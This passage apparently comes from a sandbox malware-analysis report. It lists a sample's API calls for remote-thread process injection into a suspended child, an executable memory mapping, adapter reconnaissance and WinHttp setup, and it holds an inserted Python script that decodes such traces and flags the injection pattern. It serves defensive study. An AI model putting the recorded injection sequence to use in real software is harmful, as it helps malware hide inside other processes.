    • GetModuleFileNameA.KERNEL32(?,00000104), ref: 617B24E4
    • GetProcAddress.KERNEL32(?,?), ref: 617B255D
    • GetProcAddress.KERNEL32(?,?), ref: 617B25D5
    • VirtualAllocEx.KERNELBASE(?,00000000,?,00001000,00000004), ref: 617B25F5
    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,?), ref: 617B2617
    • GetProcAddress.KERNEL32(?,?), ref: 617B2699
    • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 617B26C3
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 617B26DA
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 617B26E4
    • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 617B2707
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 617B2710
    • VirtualFreeEx.KERNEL32(?,?,?,00001000), ref: 617B2722
    • CloseHandle.KERNEL32(?), ref: 617B272E
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Non-executed Functions

    Control-flow Graph

    • Executed
    • Not Executed
    [Control-flow graph rendering for function 617B3362 (blocks 617b3362 through 617b33f2); graph data omitted. The APIs on its blocks are listed below.]
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 617B3399
    • GetCurrentProcessId.KERNEL32 ref: 617B33A5
    • GetCurrentThreadId.KERNEL32 ref: 617B33AD
    • GetTickCount.KERNEL32 ref: 617B33B5
    • QueryPerformanceCounter.KERNEL32(?), ref: 617B33C1
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
    • UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
    • GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
    • TerminateProcess.KERNEL32(00000000), ref: 617B3107
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    APIs
    • Sleep.KERNEL32(000003E8), ref: 617B2C97
    • InterlockedCompareExchange.KERNEL32(617C312C,?,00000000), ref: 617B2CA1
    • _amsg_exit.MSVCRT ref: 617B2CBE
    • __initterm_e.LIBCMT ref: 617B2CD9
    • _initterm.MSVCRT ref: 617B2CF2
    • InterlockedExchange.KERNEL32(617C312C,00000000), ref: 617B2D08
    • Sleep.KERNEL32(000003E8), ref: 617B2D3F
    • InterlockedCompareExchange.KERNEL32(617C312C,00000001,00000000), ref: 617B2D4A
    • _amsg_exit.MSVCRT ref: 617B2D5C
    • free.MSVCRT(00000000), ref: 617B2D89
    • InterlockedExchange.KERNEL32(617C312C,00000000), ref: 617B2DAB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    APIs
    • memset.MSVCRT ref: 617B205D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000064,000000FF,?,00000064), ref: 617B20B1
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000096,000000FF,?,0000005E), ref: 617B219E
      • Part of subcall function 617B1E97: GetModuleHandleA.KERNEL32(000000F6), ref: 617B1EF1
      • Part of subcall function 617B1E97: GetProcAddress.KERNEL32(00000000,000000F6), ref: 617B1F42
    • ??3@YAXPAX@Z.MSVCRT ref: 617B21D3
    • UnmapViewOfFile.KERNEL32(?), ref: 617B220F
    • CloseHandle.KERNEL32(?), ref: 617B2219
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
      • Part of subcall function 617B1176: ??2@YAPAXI@Z.MSVCRT ref: 617B1195
      • Part of subcall function 617B1176: memset.MSVCRT ref: 617B11A5
      • Part of subcall function 617B1176: memcpy.MSVCRT ref: 617B11C1
      • Part of subcall function 617B1176: memcpy.MSVCRT ref: 617B11F2
      • Part of subcall function 617B1176: ??3@YAXPAX@Z.MSVCRT ref: 617B1207
      • Part of subcall function 617B1176: ??2@YAPAXI@Z.MSVCRT ref: 617B1224
      • Part of subcall function 617B1276: CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 617B12AA
      • Part of subcall function 617B1276: MapViewOfFile.KERNEL32(00000000,00000022,00000000,00000000,00000000), ref: 617B12B9
      • Part of subcall function 617B1276: UnmapViewOfFile.KERNEL32(?), ref: 617B12DC
      • Part of subcall function 617B1276: CloseHandle.KERNEL32(?), ref: 617B12E5
    Strings
    • Cm})2&!j[V&p*njS!EnYqWSBj|WHZFB?, xrefs: 617B21FA
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    [Control-flow graph rendering for function 617B1319 (blocks 617b1319 through 617b1469); graph data omitted. The APIs on its blocks are listed below.]
    APIs
    • memset.MSVCRT ref: 617B136F
    • GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 617B13A0
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 617B13AD
    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,00000000,00000000), ref: 617B13BB
    • GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 617B13F1
    • GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 617B1411
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
    • GetLastError.KERNEL32(?,00000000,00000000), ref: 617B1461
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    [Control-flow graph rendering for function 617B1176 (blocks 617b1176 through 617b1274); graph data omitted. The APIs on its blocks are listed below.]
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 617B1195
    • memset.MSVCRT ref: 617B11A5
    • memcpy.MSVCRT ref: 617B11C1
    • memcpy.MSVCRT ref: 617B11F2
    • ??3@YAXPAX@Z.MSVCRT ref: 617B1207
      • Part of subcall function 617B2860: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 617B30EA
      • Part of subcall function 617B2860: UnhandledExceptionFilter.KERNEL32(617B4108), ref: 617B30F5
      • Part of subcall function 617B2860: GetCurrentProcess.KERNEL32(C0000409), ref: 617B3100
      • Part of subcall function 617B2860: TerminateProcess.KERNEL32(00000000), ref: 617B3107
    • ??2@YAPAXI@Z.MSVCRT ref: 617B1224
      • Part of subcall function 617B103A: __EH_prolog3_GS.LIBCMT ref: 617B1044
      • Part of subcall function 617B103A: ??2@YAPAXI@Z.MSVCRT ref: 617B1093
      • Part of subcall function 617B103A: memset.MSVCRT ref: 617B10A3
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B10C7
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B10D1
      • Part of subcall function 617B103A: ??2@YAPAXI@Z.MSVCRT ref: 617B112F
      • Part of subcall function 617B103A: memcpy.MSVCRT ref: 617B1143
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B1159
      • Part of subcall function 617B103A: ??3@YAXPAX@Z.MSVCRT ref: 617B1168
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Control-flow Graph

    APIs
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 617B12AA
    • MapViewOfFile.KERNEL32(00000000,00000022,00000000,00000000,00000000), ref: 617B12B9
      • Part of subcall function 617B14E9: memmove.MSVCRT ref: 617B1509
      • Part of subcall function 617B14E9: memmove.MSVCRT ref: 617B153F
      • Part of subcall function 617B1319: memset.MSVCRT ref: 617B136F
      • Part of subcall function 617B1319: GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 617B13A0
      • Part of subcall function 617B1319: GetLastError.KERNEL32(?,00000000,00000000), ref: 617B13AD
      • Part of subcall function 617B1319: LoadLibraryExA.KERNEL32(?,00000000,00000008,?,00000000,00000000), ref: 617B13BB
      • Part of subcall function 617B1319: GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 617B13F1
      • Part of subcall function 617B1319: GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 617B1411
      • Part of subcall function 617B1319: GetLastError.KERNEL32(?,00000000,00000000), ref: 617B1461
    • UnmapViewOfFile.KERNEL32(?), ref: 617B12DC
    • CloseHandle.KERNEL32(?), ref: 617B12E5
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd
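
    The API lists above record a technique without naming it: a child created CREATE_SUSPENDED, memory allocated and written in it, two remote threads, and, in 617B1276, a section created PAGE_EXECUTE_READWRITE and mapped with execute access. The script below is an added example, not code from the report, from Joe Sandbox or from the sample. It parses lines in the exact format the report prints ('• API.MODULE(args), ref: ADDR'), decodes the flag arguments that carry the meaning (CREATE_SUSPENDED in CreateProcessA, MEM_COMMIT and PAGE_READWRITE in VirtualAllocEx, PAGE_EXECUTE_READWRITE and FILE_MAP_EXECUTE in the 617B1276 mapping, LOAD_WITH_ALTERED_SEARCH_PATH in the 617B1319 loader, CSIDL_PROGRAM_FILES in SHGetSpecialFolderPathA) and flags the VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread chain from the Executed Functions list together with the executable section mapping. The sample trace is a constructed copy of the report's own lines; the pattern labels, in particular the LoadLibrary-style reading of GetModuleFileNameA followed by GetExitCodeThread, are this example's inference, not something the report states.

```python
"""Added example (not code from the report or from the sample): decode a Joe Sandbox-style
API listing and flag the injection technique the call chain records."""
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed sample: lines copied from the Executed Functions list (refs 617B2252-617B2707)
# and from the 617B1319 and 617B1276 blocks above, in report order; the indented
# 'Part of subcall' line is included to show that nested entries are skipped.
SAMPLE_TRACE = """\
• IsDebuggerPresent.KERNEL32 ref: 617B2252
• CreateMutexA.KERNELBASE(00000000,00000001,donotbotherme), ref: 617B226C
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000001), ref: 617B22BF
  • Part of subcall function 617B2870: _errno.MSVCRT ref: 617B2888
• CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 617B24B1
• GetModuleFileNameA.KERNEL32(?,00000104), ref: 617B24E4
• VirtualAllocEx.KERNELBASE(?,00000000,?,00001000,00000004), ref: 617B25F5
• WriteProcessMemory.KERNELBASE(?,00000000,?,?,?), ref: 617B2617
• CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 617B26C3
• GetExitCodeThread.KERNEL32(00000000,?), ref: 617B26E4
• CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 617B2707
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,00000000,00000000), ref: 617B13BB
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000040,00000000,00000000,00000000), ref: 617B12AA
• MapViewOfFile.KERNEL32(00000000,00000022,00000000,00000000,00000000), ref: 617B12B9
"""
# One top-level line: bullet, API, module, optional argument list, ref address.
LINE_RE = re.compile(r"^•\s*(?P<api>\w+)\.\w+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Win32 constants for the arguments that decide what the call chain means.
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x08000000: "CREATE_NO_WINDOW"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MAP_ACCESS = {0x1: "FILE_MAP_COPY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ", 0x20: "FILE_MAP_EXECUTE"}
LOAD_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x8: "LOAD_WITH_ALTERED_SEARCH_PATH"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x26: "CSIDL_PROGRAM_FILES"}
# (argument index, label, table, is_bitmask); indices follow the Win32 prototypes.
DECODERS = {
    "CreateProcessA": [(5, "dwCreationFlags", CREATION_FLAGS, True)],
    "VirtualAllocEx": [(3, "flAllocationType", ALLOC_TYPE, True), (4, "flProtect", PAGE_PROT, False)],
    "CreateFileMappingA": [(2, "flProtect", PAGE_PROT, False)],
    "MapViewOfFile": [(1, "dwDesiredAccess", MAP_ACCESS, True)],
    "LoadLibraryExA": [(2, "dwFlags", LOAD_FLAGS, True)],
    "SHGetSpecialFolderPathA": [(2, "csidl", CSIDL, False)],
}

class Call(NamedTuple):
    api: str
    args: List[Optional[int]]  # None where the report prints '?' or a non-numeric literal
    literals: List[str]        # argument text exactly as printed
    ref: int

def parse_trace(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:  # indented 'Part of subcall' entries and headings do not match
            continue
        raw = [a.strip() for a in (m.group("args") or "").split(",") if a]
        # DWORDs are printed as eight hex digits; anything else ('?', a mutex name) stays text.
        nums = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None for a in raw]
        calls.append(Call(m.group("api"), nums, raw, int(m.group("ref"), 16)))
    return calls

def name_value(value: int, table: Dict[int, str], bitmask: bool) -> str:
    """Bit masks get every set flag named; plain enumerations get an exact lookup."""
    names = [n for bit, n in table.items() if value & bit == bit] if bitmask else [table.get(value, "")]
    return "|".join(n for n in names if n) or f"0x{value:X}"

def decode(call: Call) -> Dict[str, str]:
    return {label: name_value(call.args[i], table, bm) for i, label, table, bm in DECODERS.get(call.api, [])
            if i < len(call.args) and call.args[i] is not None}

def in_order(names: List[str], chain: List[str]) -> bool:
    """True if every API in chain occurs in names in that order (other calls may intervene)."""
    pos = 0
    for n in names:
        if pos < len(chain) and n == chain[pos]:
            pos += 1
    return pos == len(chain)

def find_patterns(calls: List[Call]) -> List[str]:
    names, findings = [c.api for c in calls], []
    for c in calls:  # a mutex name printed as text rather than as a pointer value
        if c.api.startswith("CreateMutex") and c.literals and c.args[-1] is None and c.literals[-1] != "?":
            findings.append(f"single-instance mutex: {c.literals[-1]}")
    if in_order(names, ["VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"]):
        msg = "remote-thread injection: VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread"
        if any(c.api.startswith("CreateProcess") and len(c.args) > 5 and (c.args[5] or 0) & 0x4 for c in calls):
            msg += " into a CREATE_SUSPENDED child"
        # GetModuleFileNameA before the write and GetExitCodeThread after the first thread is the
        # shape of LoadLibrary-as-thread-start DLL injection (inference from the chain, not proof).
        if in_order(names, ["GetModuleFileNameA", "WriteProcessMemory", "CreateRemoteThread", "GetExitCodeThread"]):
            msg += "; shape matches LoadLibrary-style DLL injection"
        findings.append(msg)
    for i, c in enumerate(calls):  # executable section created, then mapped with execute access
        if c.api.startswith("CreateFileMapping") and len(c.args) > 2 and c.args[2] == 0x40:
            view = next((d for d in calls[i + 1:] if d.api == "MapViewOfFile"), None)
            if view and len(view.args) > 1 and (view.args[1] or 0) & 0x20:
                findings.append("RWX staging: PAGE_EXECUTE_READWRITE section mapped with FILE_MAP_EXECUTE")
    return findings

if __name__ == "__main__":
    print(*find_patterns(parse_trace(SAMPLE_TRACE)), sep="\n")
```

    Run over a report's complete API section, the anchored regex skips the indented 'Part of subcall function' entries, so each function is judged on its own calls. The 'LoadLibrary-style' label is only a hint: confirming it means checking the start address passed to the first CreateRemoteThread in the disassembly.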

    Execution Graph

    Execution Coverage:20.5%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:19.3%
    Total number of Nodes:491
    Total number of Limit Nodes:5

    Graph

    [Execution graph rendering: 491 nodes with their edges; graph data omitted. Node addresses run from 4f0400 to 51d480. Win32 and CRT APIs named on the nodes: IsDebuggerPresent, CreateThread, CreateEventW, GetModuleFileNameW, CreateFileW, GetFileSize, ReadFile, WriteFile, CloseHandle, GetSystemDirectoryA, SHGetSpecialFolderPathA, SHGetSpecialFolderPathW, GetShortPathNameA, CreateDirectoryW, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegQueryValueExW, RegSetValueExA, RegCloseKey, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, GetModuleHandleA, LoadLibraryExA, GetProcAddress, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, GetAdaptersInfo, strstr, wcsstr, _wcslwr, GetTempPathA, GetLocalTime, time, srand, UrlMkGetSessionOption, MultiByteToWideChar, WinHttpCloseHandle, OutputDebugStringA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, RtlUnwind, printf.]
6724->6726 6726->6607 6728 4f330d _errno 6728->6722 6730 4f4b02 6729->6730 6731 4f4af9 6729->6731 6730->6731 6732 4f4b0a _errno 6730->6732 6738 4f3ff4 6731->6738 6734 4f3287 ___swprintf_l 5 API calls 6732->6734 6735 4f32ff 6734->6735 6735->6726 6735->6728 6736 4f4b4e 6736->6735 6737 4f5ab4 _write_multi_char 13 API calls 6736->6737 6737->6735 6739 4f4057 _errno 6738->6739 6747 4f4078 __aulldvrm 6738->6747 6740 4f4062 6739->6740 6743 4f3287 ___swprintf_l 5 API calls 6740->6743 6741 4f406d 6744 4f32a0 ___swprintf_l 4 API calls 6741->6744 6742 4f4a9d 6742->6739 6742->6741 6743->6741 6745 4f4ac5 6744->6745 6745->6736 6746 4f42f0 isleadbyte 6746->6747 6747->6739 6747->6741 6747->6742 6747->6746 6748 4f3db2 13 API calls _write_multi_char 6747->6748 6749 4f4a75 _errno 6747->6749 6750 4f437f 6747->6750 6751 4f4a40 free 6747->6751 6753 4f4a8d _errno 6747->6753 6754 4f3f0a 12 API calls ___swprintf_l 6747->6754 6758 4f3de5 13 API calls _write_multi_char 6747->6758 6759 4f3e0b 14 API calls ___swprintf_l 6747->6759 6748->6747 6749->6740 6752 4f43bc 6750->6752 6756 4f461f malloc 6750->6756 6751->6747 6755 4f3e59 ___swprintf_l 6 API calls 6752->6755 6753->6740 6754->6747 6757 4f46b5 6755->6757 6756->6752 6757->6736 6758->6747 6759->6747 6452 4f5cfc 6453 4f1a3c 2 API calls 6452->6453 6454 4f5d08 6453->6454

    Executed Functions

    Control-flow Graph

    APIs
      • Part of subcall function 0051668C: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
      • Part of subcall function 0051668C: RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • GetSystemInfo.KERNELBASE(00000000,80000002,?,?,00000000,00020019,00000340), ref: 00517672
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 005177C2
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177D3
    • ??3@YAXPAX@Z.MSVCRT ref: 005177E0
    • ??2@YAPAXI@Z.MSVCRT ref: 005177E8
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177F7
    • ??3@YAXPAX@Z.MSVCRT ref: 00517809
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • ___swprintf_l.LIBCMT ref: 00517830
    • realloc.MSVCRT ref: 00517875
    • ___swprintf_l.LIBCMT ref: 005178C8
    • ___swprintf_l.LIBCMT ref: 005178FB
    • realloc.MSVCRT ref: 00517949
    • ___swprintf_l.LIBCMT ref: 00517980
    • realloc.MSVCRT ref: 005179A8
    • ___swprintf_l.LIBCMT ref: 005179D6
    • ??3@YAXPAX@Z.MSVCRT ref: 00517A07
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • Ethernet adapter Local Area Connection:, xrefs: 00517822
    • Name. . . . . . . . . . . . . . . : , xrefs: 005178E9
    • Subnet Mask . . . . . . . . . . . : , xrefs: 00517965
    • Physical Address. . . . . . . . . : , xrefs: 005178D1
    • Default Gateway . . . . . . . . . : , xrefs: 005179C4
    • %s%s, xrefs: 005179CD
    • %s%s%s%s%s%s, xrefs: 005178F2
    • %02X-%02X-%02X-%02X-%02X-%02X, xrefs: 005178BD
    • IPv4 Address. . . . . . . . . . . : , xrefs: 0051796E
    • Description . . . . . . . . . . . : , xrefs: 005178DD
    • %s%s%s%s, xrefs: 00517977
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd

    Control-flow Graph

    APIs
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • strstr.MSVCRT ref: 00513B2D
    • strstr.MSVCRT ref: 00513B5C
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A741
      • Part of subcall function 0051A729: _errno.MSVCRT ref: 0051A788
    • strstr.MSVCRT ref: 00513BAC
    • strstr.MSVCRT ref: 00513BCC
    • memset.MSVCRT ref: 00513BEE
    • memset.MSVCRT ref: 00513C05
      • Part of subcall function 00511B92: WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000001,?,00513CC2,00000000,00000000,?), ref: 00511BA8
      • Part of subcall function 00512004: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513D67,00000000,?,00000000,00000001,00000001), ref: 00512062
      • Part of subcall function 00512107: WinHttpOpen.WINHTTP(00000000,00000003,?,00000000,00000000,?,HTTPS,?,?,?,00513DA1,00000000,?,00000000,?,00000000), ref: 0051215A
      • Part of subcall function 00511B49: WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00513E74,00000000,00000000,?), ref: 00511B60
      • Part of subcall function 00511B49: GetLastError.KERNEL32 ref: 00511B6C
      • Part of subcall function 00511BD3: WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00000000), ref: 00511C12
      • Part of subcall function 00511BD3: memset.MSVCRT ref: 00511C38
      • Part of subcall function 00511BD3: memset.MSVCRT ref: 00511C56
      • Part of subcall function 00511BD3: memset.MSVCRT ref: 00511C90
      • Part of subcall function 00511BD3: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000020,?,00000020,?,?,?), ref: 00511CA3
      • Part of subcall function 00511BD3: WinHttpGetProxyForUrl.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00511D33
      • Part of subcall function 00511BD3: WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C,?,?,?,?,?,?,?,?,?), ref: 00511D57
